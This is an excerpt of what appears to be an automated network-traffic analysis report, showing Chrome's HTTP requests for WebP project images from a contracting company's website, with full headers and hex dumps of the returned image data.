fe 97 a0 ef b6 1f 77 fd 9b f6 01 fc ef fe 1e 96 ff
                                              Data Ascii: RIFFWEBPVP8XVP8 <*>nS)&3en-\_rk_HvwstvlNeC|U{>^'<I'>lOw~tO+/OE_O.Lo_*o<'Yw}cew
                                              2024-09-27 06:20:16 UTC8000INData Raw: 6a 32 00 f2 5b 06 70 25 48 92 d2 ea b6 1b 04 91 b1 47 83 90 73 a9 4b 3c 4a 4c 41 77 0b 54 95 cc ac e6 9c c9 63 ab 84 78 f7 dc c6 ef 63 6d cf 5d a9 8a 0c 5c 78 88 85 50 7b 06 f3 cf b7 9c 68 1f be bd c5 ac e5 f1 98 94 31 92 cb af 46 40 06 ac 91 ed ab 0e 75 3a b7 4c 22 eb 3f 2b 94 8e 9d 1b 32 f8 37 c1 67 2a 73 57 1a d4 98 7a b4 b7 6f be 3a 33 d8 78 2f dd b4 23 c8 b9 cb 4e 40 50 8c 3b b9 86 18 0f 44 52 39 fb ac 7e a2 db 9b 38 99 37 a0 4c d4 a4 ae 80 fe 00 43 36 4d d4 29 f4 76 ba 6a b8 89 33 3d eb 3d 71 df 15 26 66 57 9b b5 a2 9c 3f 7a 37 50 8d d8 e1 e0 16 18 10 5b 73 98 bd 93 3a 6b de 21 db ed 57 bf 24 62 0d b6 85 91 06 96 4b 16 cb b6 90 d3 be c0 fb fd 48 92 44 5f a6 e6 63 50 52 f8 12 f9 01 c5 2d 68 d0 f1 83 a9 6f eb e7 e1 c8 a0 ca 88 44 4d 2a 21 a4 a0 d0 97
                                              Data Ascii: j2[p%HGsK<JLAwTcxcm]\xP{h1F@u:L"?+27g*sWzo:3x/#N@P;DR9~87LC6M)vj3==q&fW?z7P[s:k!W$bKHD_cPR-hoDM*!
                                              2024-09-27 06:20:16 UTC8000INData Raw: a1 6f 83 37 9e 48 de 73 96 ed 0c e5 77 ca 5c ce 00 64 0d 30 ce 0b 6d 8f b7 86 c6 c3 5a 5f 49 68 6c ca 79 75 0f cb a0 7a 00 45 1c 1b d6 c8 9c 91 e9 67 e2 80 49 cb 24 80 48 1a 4e e0 90 73 22 71 8c 0d 16 76 0b 50 ce 67 fd ab f2 a0 41 e2 22 01 6f 24 ff 1c f7 fa ad 55 67 6e 47 b1 28 f4 61 1a 0c b0 6d d7 f8 14 9c ae 4c 4a 14 a1 e9 23 5f 35 cf 99 2d fe 28 99 b3 89 fc b6 7e f0 9a 27 12 e8 60 1b 32 86 e3 4a 97 c6 ff 6f cf fc 52 63 33 ca 97 04 51 c5 a8 3c 8a 3a 04 ee 1a 8f c5 a2 5b 5a b6 4a 48 ff 0a 58 4a 69 6c 3a f9 88 b8 23 8f 90 13 41 e6 bd d6 66 dc 4f de 02 73 1d ac 7d 1d 11 95 49 e7 eb 52 8f 04 5a b4 fe a8 89 b7 43 d7 50 d9 c7 c3 20 3b 15 59 c2 48 ea 3e 5a 8a c3 42 38 37 47 d1 e3 9b 79 18 19 95 60 6f a1 f5 bc 05 b4 96 67 51 5b 00 8e 75 d9 e3 f5 c1 d6 ce e9 03
                                              Data Ascii: o7Hsw\d0mZ_IhlyuzEgI$HNs"qvPgA"o$UgnG(amLJ#_5-(~'`2JoRc3Q<:[ZJHXJil:#AfOs}IRZCP ;YH>ZB87Gy`ogQ[u
                                              2024-09-27 06:20:16 UTC8000INData Raw: b7 6f ad 26 c7 5c cc 45 8e c7 09 c2 15 5a e0 69 5b 4f 04 57 cd be 8c cd 25 f4 e8 4e 56 cc dc 10 3b 5f a8 14 7f 6d 24 65 58 38 f7 64 17 32 ed 17 fa 05 2f 38 e9 27 dc f9 cb 9e 62 0d 31 21 40 37 f8 65 95 61 ef 68 a4 86 2b a9 be a9 44 f0 00 cf 9a fd 06 2a 96 d2 36 71 69 32 86 6f 33 3a 98 06 d3 cb 57 cc 75 33 49 f4 d2 e7 c4 65 fe ff 6d d6 cf e6 77 2d c8 47 6b 0d 54 01 3e 09 1f f1 45 72 60 62 43 6d 20 ad fb ca b2 9f 40 94 a3 ee e9 59 f2 df e4 d7 90 56 c4 48 11 b9 82 70 45 2d 3a ce d9 4c bc 99 13 63 b5 b5 cd 41 8d 55 f6 17 d5 3d c6 b3 c8 56 a0 e3 60 94 e3 5e cc 6c 57 ba 05 02 6a f7 98 38 6e af f5 7b 94 e2 8c 06 0d f9 4b 13 e4 66 a0 28 d8 95 8b ff 19 e0 c3 d2 17 08 c9 8c 1d a1 03 d8 1d a5 8a 24 c4 3b 9b 0a 15 75 d9 d9 1d f7 fe e0 b5 2a ce 17 0b 58 f0 9d ae f3 53
                                              Data Ascii: o&\EZi[OW%NV;_m$eX8d2/8'b1!@7eah+D*6qi2o3:Wu3Iemw-GkT>Er`bCm @YVHpE-:LcAU=V`^lWj8n{Kf($;u*XS
                                              2024-09-27 06:20:16 UTC8000INData Raw: 3e b1 07 2b 97 44 44 67 42 3d c0 e3 d3 fc 0e 07 cc d0 d7 ca f8 46 06 a5 48 9f 85 c1 eb ab 97 78 e1 0e 62 1c d2 d1 7d 82 fc 8e 83 42 93 c2 2a 9f 63 be 46 f5 93 60 7a c2 69 c9 77 b8 7e 98 94 30 ec af f5 45 63 6d a9 16 cd e0 5a d1 c0 f7 2e 27 66 dc 96 96 fa c1 f3 3d c9 3e ce ad e8 b5 20 a6 6e 67 86 e9 18 b9 43 69 5b 2b 57 cc 17 ff 8f 85 23 26 43 60 ed b7 1d d5 e0 ed d1 17 68 e4 e7 81 29 61 b3 71 0d 88 99 33 53 62 3e 39 1f 7d 38 4b 19 6d bd 2b ad 08 54 a8 4a c4 db ee 5d 43 95 19 d5 24 a0 96 a3 55 54 dd 6f 37 49 bc 4a a7 fc f1 fa 59 6d b8 3c 57 a9 e1 cb a0 a0 c3 4d 97 6c 4e aa 11 1b 10 29 9e 13 06 43 ca b8 7a 36 7a 4c 9f 60 12 4f 81 f9 55 a3 f7 46 86 61 5f bc f4 a1 18 39 9f a0 ae 6a 56 cd f5 e7 da 78 f7 e7 28 e6 a4 48 1d 7d 0a 95 ff 58 63 20 41 22 21 0f 01 aa
                                              Data Ascii: >+DDgB=FHxb}B*cF`ziw~0EcmZ.'f=> ngCi[+W#&C`h)aq3Sb>9}8Km+TJ]C$UTo7IJYm<WMlN)Cz6zL`OUFa_9jVx(H}Xc A"!
                                              2024-09-27 06:20:16 UTC8000INData Raw: f2 59 65 fd a7 a8 25 16 29 60 eb e5 9d aa 61 17 f9 4d 93 11 6e 78 45 d4 2b 8b 23 00 2a ff 4b b7 1d 82 e7 33 53 27 0c 1b 4f 1d 9a e2 ac dc 81 0d 53 3a 3d c2 dc 9c 83 46 93 f4 c7 dc 80 53 c8 8e a1 17 08 a4 d8 25 0a 41 61 72 44 39 ae eb 02 36 01 fb e8 77 61 a8 28 6b 56 31 1b 48 a2 df b6 f3 a1 60 d3 0d 17 ad b0 74 6b 10 23 8b cc 4a 54 e8 fb 77 46 e6 ea ac 5e 54 6b f8 22 d2 f2 61 ee 8b 98 b1 d9 c8 d9 3d 56 03 b9 4f a3 eb 90 c6 b0 bd 48 7e 46 ac 46 a1 f9 cb 7f 99 73 2d 06 a7 8a c3 c0 f0 16 bd eb 9e 63 cc 20 a3 7b 7a 5e 92 9b be a3 c8 21 ce 6c 64 49 42 43 b7 aa fd fa 82 3b 94 cd 75 9a 51 79 e9 f0 3b 91 fc 06 15 48 73 89 2f fc b1 b6 2c 8a cb 5d dd 0b d0 30 b1 38 cf a0 e8 18 6b 43 41 1f 7c e4 1a 42 de 9d 48 43 26 53 81 60 d4 dd b9 f7 3b e1 96 99 16 d8 65 32 b7 9b
                                              Data Ascii: Ye%)`aMnxE+#*K3S'OS:=FS%AarD96wa(kV1H`tk#JTwF^Tk"a=VOH~FFs-c {z^!ldIBC;uQy;Hs/,]08kCA|BHC&S`;e2
                                              2024-09-27 06:20:16 UTC8000INData Raw: e4 dc 68 95 78 4a 98 56 d7 82 76 28 58 a7 0b 50 e4 2c 22 c0 cc cc e0 91 39 2c a0 4f 30 3c f7 95 94 41 b8 19 98 87 55 e1 dd ee 3e 82 2e 5b 8f 43 20 aa 5b 01 c8 f5 74 1d b9 c1 1d 3a bc 16 50 e7 7c 79 13 12 dc 94 39 c8 a9 8c 8b ba e3 b1 09 8f fc c2 cb c5 d9 05 05 a8 74 3b 68 8b 48 b4 5d 77 da 82 d1 74 e1 8a 33 85 d3 15 f1 58 f2 f1 b4 d9 a8 e5 49 d9 64 3c 8b 7e ff 72 f4 5a be 91 f4 e7 34 62 19 3c 55 aa a2 33 99 a9 a4 7f a8 0a 95 a7 1b e1 33 a2 a1 32 2e dd 0c 46 e6 f6 ad fe 6c 2c 85 a4 98 dc 50 37 c4 23 8f 50 3b 4f a3 a5 f8 72 85 a6 7c 76 b8 fa e0 ee ea 96 32 e8 98 82 02 8c 45 bc b2 72 ce c6 cc d6 d1 68 94 17 54 f9 c2 4a b1 7c d7 6f ba 7d 6c e4 19 89 fa 72 48 72 58 00 5c 2d 56 a1 60 39 82 04 ae 15 ba e3 a9 3d 78 19 52 5e b0 90 10 d6 e5 8e b0 fa 04 f4 70 d3 25
                                              Data Ascii: hxJVv(XP,"9,O0<AU>.[C [t:P|y9t;hH]wt3XId<~rZ4b<U332.Fl,P7#P;Or|v2ErhTJ|o}lrHrX\-V`9=xR^p%
                                              2024-09-27 06:20:16 UTC2109INData Raw: b9 b5 0a f0 ed 59 98 bf e5 c5 4d f1 82 0e b2 b6 2c 4e b8 9d 18 96 fa 55 5a 25 b6 48 08 4d d2 31 1b 10 e9 17 09 4f 9d 09 62 62 04 de ac 28 1a eb 4f 23 c2 97 9f 51 66 c6 f5 6a 3d e5 45 b4 37 91 46 13 46 6c ee 14 e7 4a e3 5d 9a d7 3e b3 4b c9 05 7f f9 59 d3 5d bc 59 4e cd 70 d4 fd 7f eb 60 4b f4 76 03 bd db 8e 84 1b 6d 03 ae be ba b9 78 21 94 a2 6b 0e 41 24 5f 85 ec 12 69 eb 4b fe 11 e3 e4 7b b5 25 39 7c 14 c2 a3 3f a4 e5 19 9b 6c f4 19 e6 84 41 56 c0 8b e2 9f 5e 5e 53 8e 73 46 f5 09 99 4f 04 94 b2 2b 38 ce d7 6f 16 91 77 48 38 0b 88 7d 5a a9 02 df ca 4d 90 8e 82 d3 b2 26 2e 92 d5 91 57 68 7d fa 9f 67 e7 13 91 52 3c 67 6f 1a a7 d0 45 b2 88 73 80 61 04 58 1c f0 73 16 27 0c b2 3c ea 71 3e 63 e9 3a 53 27 b1 0c 7c b7 e7 8e 71 0a d0 8d 71 b2 57 54 77 e5 14 d7 7f
                                              Data Ascii: YM,NUZ%HM1Obb(O#Qfj=E7FFlJ]>KY]YNp`Kvmx!kA$_iK{%9|?lAV^^SsFO+8owH8}ZM&.Wh}gR<goEsaXs'<q>c:S'|qqWTw


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              89192.168.2.465423173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:16 UTC724OUTGET /uploads/projects/13/ede6b29ab48bcd7727bef37740e56b13.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:16 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:16 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 09:44:05 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 64982
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:16 UTC7931INData Raw: 52 49 46 46 ce fd 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 5a fd 00 00 f0 73 05 9d 01 2a cf 04 a3 03 3e e9 6e af 52 a9 26 29 ab a5 36 2a 71 70 1d 09 65 6e 50 c6 dd 4f 8a c5 db f3 fb 3c b0 f8 66 87 f7 aa ff ea f5 2f e3 2f 38 44 71 f3 7f 2a af 18 5f d4 5f 53 8f 67 df bd 91 51 e4 dc 7a 39 db f5 7c 57 4f e3 fe b7 68 0f fa bd 46 bd 6f 38 3d d1 ed 6f b1 35 c3 f6 cf db bf fb e9 d7 9b d7 63 e8 2f ee 1f f2 79 fc ff f5 ec a3 fd 67 ff cf 5b 8e 97 3f dd 7a 1d f7 63 bd 74 3f 9b f4 e4 fa f3 7f bc c8 f5 fa 4f 96 df a6 7f 8f e0 6f e9 9e f8 1f d0 fb 7a 60 2f e6 3c 1e fe db fb d3 fe 9e bf 3b 5b fe 1f fc 0f 41 af d8 3f 7d 7a b7 ff 57 76 ae ff e6 3b f0 e7 bf fe 9a 93 86 fa cb 50 3f dc ef 55 7c 48 7f 41 e8 b9 e9 27 ff a7 ef 77 ac 3f
                                              Data Ascii: RIFFWEBPVP8XVP8 Zs*>nR&)6*qpenPO<f//8Dq*__SgQz9|WOhFo8=o5c/yg[?zct?Ooz`/<;[A?}zWv;P?U|HA'w?
                                              2024-09-27 06:20:16 UTC8000INData Raw: d5 2d f4 db f3 be 55 e7 69 dd 13 06 93 1f 48 59 66 de bd 3f 48 7c 06 80 53 e0 c6 23 ec ea dd 32 88 4b f3 3a be d4 87 68 b9 e9 1c 2b 61 a9 64 c3 48 6a f3 46 95 1b e5 e8 09 cc 5f 7a 98 ea 69 8d 63 fc f6 10 13 05 ea ab 03 31 64 c6 eb 0f e8 dc e2 63 7b 31 ed d6 c7 56 d4 da 3f 89 a7 11 f9 18 91 1f 75 28 5d 36 24 2d 1a 90 3b 10 b2 2f 66 40 35 ab 4a 77 89 2a ed 07 55 d9 ff 9f 19 99 7d 28 c4 2b 01 06 e3 1c f3 1c b9 ba ed ca 87 36 42 8b 64 aa 03 1e 3b 6e 0e f6 46 64 cd 89 7e a8 e1 c2 40 e1 6e 07 8f 9c 37 63 70 d4 b6 4e 16 be f6 9a f1 e3 a8 20 f1 a4 43 06 4b a0 5f 27 25 b3 5a aa c5 e8 7f 35 6c b2 27 78 77 39 78 76 23 06 12 26 3d 3a b2 61 f0 d4 47 1e c6 99 23 45 c1 6b 30 9d 10 b5 a5 68 42 e6 55 a8 58 63 41 28 69 44 6f 28 b9 8d 9d d4 71 31 02 0b 3f b6 70 14 71 72 78
                                              Data Ascii: -UiHYf?H|S#2K:h+adHjF_zic1dc{1V?u(]6$-;/f@5Jw*U}(+6Bd;nFd~@n7cpN CK_'%Z5l'xw9xv#&=:aG#Ek0hBUXcA(iDo(q1?pqrx
                                              2024-09-27 06:20:16 UTC8000INData Raw: 68 52 64 24 64 b6 6e 64 0c 2d 9a 1c 8c f1 fc 51 ca 2c 9a 95 1a 36 a1 fe d0 3f c1 bc 3d e0 c9 92 2f 7b 0b 48 7a d3 e3 de c3 ef 67 28 4d 08 bb 83 aa b2 35 76 fc 17 7b 0d ab 3a a1 d2 cb 54 a4 b6 d4 6d a7 cc d7 96 80 e8 e2 b8 43 d4 a9 73 a7 61 27 dd 49 83 37 fd 24 d1 23 29 ec 26 29 e8 ac 5a 0a 80 51 2e ce e3 4c c3 8f 81 5c 21 2f 85 e1 5c 7a 92 64 73 38 8e bf 00 3c fd 1e 17 84 8f 09 8b 1c 29 68 d4 c5 f5 cc e9 0d e3 e2 7f c0 bc 20 2e 53 f6 a8 28 75 90 8b 9c c3 48 b1 1d 3e fc d8 83 49 3c 63 cd e2 d5 a1 4b b7 c4 01 a1 5a c6 e2 22 df 99 b0 46 6a fc c2 6e d9 c1 16 2c 97 db be eb ac 67 b6 20 ca ca 03 0f 0d a1 cf 60 98 53 ee a4 ae cc 10 17 8d b9 b3 bc 5e 08 de 32 d0 68 1c 96 de 44 f5 79 43 36 ba a2 ec a6 0f 41 a6 5c bd ba bf f3 c2 2b 9f 08 6b d2 cf 14 db d0 8e 80 07
                                              Data Ascii: hRd$dnd-Q,6?=/{Hzg(M5v{:TmCsa'I7$#)&)ZQ.L\!/\zds8<)h .S(uH>I<cKZ"Fjn,g `S^2hDyC6A\+k
                                              2024-09-27 06:20:16 UTC8000INData Raw: 84 39 2e 38 97 b8 ec 0c 8c 07 33 b0 17 aa af 64 26 84 37 0d 4c 6d 7b 0f 4d 89 e1 6d 85 52 89 11 21 0a b1 40 00 15 94 d9 c8 a9 0e 27 8a e0 b3 40 8f 90 30 0a e3 c5 6e 6b 0d 7e 03 84 f2 bf 7b 41 09 3f 89 90 b9 71 32 40 e3 fb 86 f5 94 0d b4 7f ea fe 46 d9 ce 2c 62 0d 02 e9 d4 ae b7 10 28 ea d6 2d d9 8b 39 1f 5f b0 cf 49 31 e4 a4 23 33 fb 7d 50 19 c0 3b 8c b2 98 ff a6 7e 6e 2e 1d bf 14 19 e5 b3 0f bc 7e 44 69 0e ba d4 86 20 bb 09 ee ac d8 8c be 86 55 1d 38 2c 1d c4 32 15 c4 f9 18 25 16 e8 ae b2 ef d4 ed 15 c3 ba 81 8d 4c 6c 6d 19 2b d1 1f 81 16 ea 0d d5 3f 31 b4 96 99 ba 08 06 6a 55 d2 50 61 43 1c 6a 13 21 89 b2 c5 d4 87 4e 5c 96 db 98 f2 d8 27 a8 13 44 a1 25 a3 5a 99 e8 45 7d 83 a7 00 be af 07 24 a2 36 52 ba 3a ad fe fd d6 34 68 78 16 d6 dd 5f f2 e8 8d 0a 7d
                                              Data Ascii: 9.83d&7Lm{MmR!@'@0nk~{A?q2@F,b(-9_I1#3}P;~n.~Di U8,2%Llm+?1jUPaCj!N\'D%ZE}$6R:4hx_}
                                              2024-09-27 06:20:16 UTC8000INData Raw: 26 03 71 c2 52 f8 f7 23 fa 5a f3 e6 db 26 0b cb ee 76 2c ac 32 13 97 9c 3b 31 f0 a2 0e 34 6b 10 51 e2 b1 e5 0d 1b 50 e2 2f 39 da 46 6a ba 6c a6 eb 4f d8 8a fe d8 52 22 20 b7 49 4d ad 3e b6 8c 69 43 1b 0a 4a f9 1e 8c 2d 2f 07 98 48 c9 53 7c a9 9b b2 67 9a 78 5f db a1 7e 02 56 57 66 f7 d8 3d 9f cf 40 61 be 98 52 42 0b 57 b4 57 1a e2 e8 c8 0a dd 8d 62 87 5e e6 65 4d ab 73 0e 76 2b 96 ec d0 66 c0 af e6 08 ad 3b 50 3a 0c cc f9 de 86 8c 0b b2 63 1f 6c 8d ce 14 6c d9 ef 67 d0 ae 4a c3 ef 91 3d 62 c8 96 12 35 86 f6 3e 8c 70 d1 52 08 56 3a ed b4 2a 54 38 c9 f3 23 fb be d9 da 9b c0 48 04 50 a1 a7 fd ef 4a 6c c7 8a 69 d4 84 10 d7 3c 84 12 2d 31 00 9e ff 1b 45 62 7d 39 77 7d 2b 6e 7c 23 94 75 cf 0e 7e 1b bd cb 36 66 3f 1c 33 f5 25 68 26 38 83 0f 58 67 06 61 8c e5 e9
                                              Data Ascii: &qR#Z&v,2;14kQP/9FjlOR" IM>iCJ-/HS|gx_~VWf=@aRBWWb^eMsv+f;P:cllgJ=b5>pRV:*T8#HPJli<-1Eb}9w}+n|#u~6f?3%h&8Xga
                                              2024-09-27 06:20:16 UTC8000INData Raw: 00 70 f4 70 a9 8b f1 83 71 23 fb 53 82 7a 60 48 64 14 eb f1 be 97 21 82 61 e3 4a 09 01 48 f2 a6 c6 93 ef 4e b7 48 38 79 61 83 7c c9 e0 d7 d8 a3 0a ea 49 ef 20 0b d7 0d 78 8b 7f bc 68 be f2 b0 16 6f 2d 6f 61 a9 da 24 d8 07 ef 1c 30 f7 c8 22 c5 98 f6 26 c5 1b 28 3d b6 bf d5 2e 73 86 e6 e1 c5 06 53 6b 56 89 40 4a 7f 0a 20 4f 79 90 0e d9 2c 83 b8 18 62 95 5d 55 48 ce 08 a9 c0 79 3c 82 f3 ef 97 86 fc 11 a7 3f 16 e5 ad c1 26 44 de df cc 70 5f f3 27 91 8e 04 03 e8 29 43 cf 2c 52 f8 ef 50 d2 cb e4 e6 6a ee e7 42 e4 44 cb 4b c8 d6 2e fa 95 3b a6 b5 de 59 85 8a 73 87 2a ae 30 b1 49 23 45 b5 92 15 1c 11 21 9a bc 5f eb 61 bb 4e d0 26 3b 6a 7e 3c 74 bf cc 0d 4d 71 60 19 16 30 0b 09 08 ed 3f 93 ab ac 15 18 63 37 36 9f 0c 61 2d 7a 4a 26 40 40 ce c6 1e 1d 2c 3f 52 e3 a2
                                              Data Ascii: ppq#Sz`Hd!aJHNH8ya|I xho-oa$0"&(=.sSkV@J Oy,b]UHy<?&Dp_')C,RPjBDK.;Ys*0I#E!_aN&;j~<tMq`0?c76a-zJ&@@,?R
                                              2024-09-27 06:20:16 UTC8000INData Raw: 13 bb 14 00 03 ad 34 a6 2f 0e 9b ae 96 ac 34 73 21 74 72 c1 47 7a 74 e0 0c 5c 41 52 56 4d 92 d2 41 51 39 95 65 31 c3 b4 c1 50 16 cd 3d 3b c0 9a f7 9c c2 8e c9 e8 87 d8 88 09 ad 73 b7 9b 7f c6 d6 1b b2 62 a5 78 6d fe c3 20 56 31 af 60 8a 1f a5 de 09 05 e7 26 22 f0 f2 ab 4a e4 ab de 9d ba aa 4c 3a 8c cf 42 21 57 07 29 51 78 a3 fa 5b 4d 53 91 78 6e 0a 59 02 f6 72 a8 0b b8 5c d1 52 29 50 3c 61 13 65 ce 6e 1a 25 25 ac 25 eb d1 f7 46 b2 b0 72 5c 5c 3b f4 61 00 58 06 07 18 a5 a4 6a e0 09 82 4d d2 16 1b dc 23 27 4d be 67 81 71 58 bb 77 88 ab c0 25 ee 59 17 72 af 05 93 b7 d4 cb f2 d8 5e af 3a b2 87 fb 97 de bd 73 7c 67 a2 37 51 4d 4b 49 d8 6d c9 02 24 b2 90 2c 17 35 df 65 24 2e f9 bd 8f c8 c3 39 87 46 66 ff d5 38 e9 f7 ec c7 7d 8e 82 a8 0f f3 44 cc e3 a1 5b 0a d3
                                              Data Ascii: 4/4s!trGzt\ARVMAQ9e1P=;sbxm V1`&"JL:B!W)Qx[MSxnYr\R)P<aen%%%Fr\\;aXjM#'MgqXw%Yr^:s|g7QMKIm$,5e$.9Ff8}D[
                                              2024-09-27 06:20:16 UTC8000INData Raw: 8e 4c 4e 13 29 0a 7c f0 de 2d a6 52 31 67 ea 71 41 6d 57 b8 42 16 7d 20 c2 4f fe 02 67 44 71 91 db 01 35 66 c7 77 f7 9a f7 11 7d db 01 66 02 3d f2 f1 12 16 74 cd 4c f8 9b b5 ee d5 92 46 20 57 48 67 8a df f9 d5 6f df 9d fc 5d df 16 32 e9 15 6b d8 c1 c0 f1 62 76 a7 db 7b 84 8e 1d d0 a4 d2 7d ab 70 6b 39 5c c6 6e f6 ba a5 91 d9 90 73 08 8e 6c ff ca a1 13 53 ab e4 7d e3 7e 53 23 d2 bf 90 24 b5 c1 20 77 b7 d8 3b d4 bc 27 a1 33 47 e1 e9 84 96 e1 9e 19 54 0d 5a 97 fa be d6 a5 f5 50 65 29 92 f0 30 26 28 4c 85 41 d9 ff 76 34 ea 36 07 7d 6f db 79 39 76 ce 15 ad bb 1d c8 09 fe 88 70 fe 69 e1 b6 19 aa c0 95 60 c3 c2 a8 62 37 04 c9 36 74 28 7c b3 03 e6 06 c0 af 2d 78 c5 c0 11 3f 77 55 00 02 a9 b2 18 9a 5b d0 47 a7 fa b5 39 71 a8 ba 87 6f bd 2b 8d 0c 79 41 6d 9d 9a be
                                              Data Ascii: LN)|-R1gqAmWB} OgDq5fw}f=tLF WHgo]2kbv{}pk9\nslS}~S#$ w;'3GTZPe)0&(LAv46}oy9vpi`b76t(|-x?wU[G9qo+yAm
                                              2024-09-27 06:20:16 UTC1051INData Raw: e7 77 90 64 1a 94 bd 06 82 48 ad 1d 1c 55 07 0f fa a8 f6 fc 9f 3a 59 9b 8b 10 10 6f f0 b1 35 07 7c a6 b6 29 83 20 1d 76 e7 49 3b 5e 7e 7d c1 bb 41 7a 76 09 5a 6d a6 b5 71 ea d8 02 12 79 2d bc e2 54 0d 89 41 e4 5e 6e b6 b1 bb c0 1f ab 90 4c 16 cf 50 d4 c7 fc 69 de 6d 9e 4a 39 ed c2 e5 0e 75 38 66 83 5d 2c 20 57 83 c7 e8 01 42 d6 d8 2e 2d 89 55 90 35 d8 0e 7c c7 19 b2 9a f8 e7 e4 22 eb 02 e2 68 a4 91 41 27 fb 9a 35 c1 20 8a a8 e0 5b b0 0f c5 cc aa 30 b1 e7 40 96 c9 0d 01 0c 64 de 61 6c ae 43 d1 2b 63 a5 fc 88 b4 fc d3 69 d2 14 0a 79 05 a9 8d 35 22 9b 00 3a 2d 50 f8 c2 a4 69 11 40 36 58 48 1b 3a 1c 12 92 71 ad a7 52 e0 4b ed de f5 ba 18 9f ec e0 0f b1 d4 15 82 5a b6 70 29 20 6e 88 01 1f 00 09 14 9e 88 f7 30 13 b3 70 b7 6f 9f 1e 89 8d 33 b7 b3 3a 44 22 61 ec
                                              Data Ascii: wdHU:Yo5|) vI;^~}AzvZmqy-TA^nLPimJ9u8f], WB.-U5|"hA'5 [0@dalC+ciy5":-Pi@6XH:qRKZp) n0po3:D"a


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              90192.168.2.465426173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:16 UTC724OUTGET /uploads/projects/11/dc8d49617e8c915bd5328fa315b82453.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:16 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:16 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Wed, 11 Jan 2023 14:30:52 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 67992
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:16 UTC7931INData Raw: 52 49 46 46 90 09 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 1c 09 01 00 b0 6d 05 9d 01 2a cf 04 a3 03 3e e9 6c ae 52 29 2b 33 3b 26 34 0a fb 60 1d 09 63 6e 50 bc 39 75 f1 fb 7e b8 7f e6 67 20 f1 a7 f8 39 ab ff 97 6b 0f 46 f9 5b 78 d7 fe be 49 0c 68 57 06 3d 4b 6d ee f4 f7 e8 78 d7 f9 be 6e 15 2b 6b f0 11 fa 8f f1 e8 b2 f7 ca 6d 3c b2 fb 7f 2d ff 8d ef 73 ff 6f d7 6f f4 ef f3 5f f9 ff 3f fe 64 fd 0b ff e2 f6 4f fd 47 ff 77 ab 4f e8 5f f2 bd 67 fd 40 7f aa df b9 fe f3 ea c1 e7 57 eb 73 fd e7 d5 97 4b bb e7 ff f9 bc f3 fd 27 b1 7f d0 fb 0b 70 57 f4 de 0c ff 60 fe 49 9e 9f f2 bc 17 fd 9b f8 af d9 cf 62 0f d9 bc 93 3f 5b f6 f7 c2 23 5f ff 93 fb 81 ec 1d ed 9f dd 7d 07 ff 53 ce 7f ea 7f dc 7b 02 f9 c5 e2 dd f7 af fd 7e
                                              Data Ascii: RIFFWEBPVP8XVP8 m*>lR)+3;&4`cnP9u~g 9kF[xIhW=Kmxn+km<-soo_?dOGwO_g@WsK'pW`Ib?[#_}S{~
